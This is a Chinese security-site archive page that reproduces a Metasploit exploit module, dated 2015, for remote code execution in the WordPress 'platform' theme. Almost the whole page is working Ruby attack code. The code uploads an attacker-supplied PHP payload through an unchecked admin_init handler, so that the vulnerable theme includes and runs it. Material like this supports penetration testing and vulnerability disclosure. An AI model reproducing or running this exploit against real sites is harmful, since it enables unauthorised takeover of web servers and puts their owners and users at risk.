首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Platform Theme Remote Code Execution
来源:metasploit.com 作者:Mehlmauer 发布时间:2015-02-04   
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Remote Code Execution in Wordpress Platform Theme',
      'Description'    => %q{
        The Wordpress Theme "platform" contains a remote code execution vulnerability
        through an unchecked admin_init call. The theme includes the uploaded file
        from it's temp filename with php's include function.
      },
      'Author'         =>
        [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
          ['WPVDB', '7762']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['platform < 1.4.4, platform pro < 1.6.2', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 21 2015'))
  end

  def exploit
    filename = "Settings_#{rand_text_alpha(5)}.php"

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
    data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')
    data.add_part('pagelines', nil, nil, 'form-data; name="page"')
    post_data = data.to_s

    print_status("#{peer} - Uploading payload")
    send_request_cgi({
      'method'   => 'POST',
      'uri'      => wordpress_url_admin_post,
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => post_data
    }, 5)
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec Altiris Agent 6.9 (Bu
·WordPress Pixabay Images PHP C
·Trend Micro Multiple Products
·BullGuard Multiple Products Ar
·HP Data Protector 8.x - Remote
·K7 Computing Multiple Products
·X360 VideoPlayer ActiveX Contr
·AVG Internet Security 2015 Arb
·Internet Explorer 11 Same Orig
·Malwarebytes Anti-Malware / An
·MS15-004 Microsoft Remote Desk
·Shuttle Tech ADSL Modem-Router
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved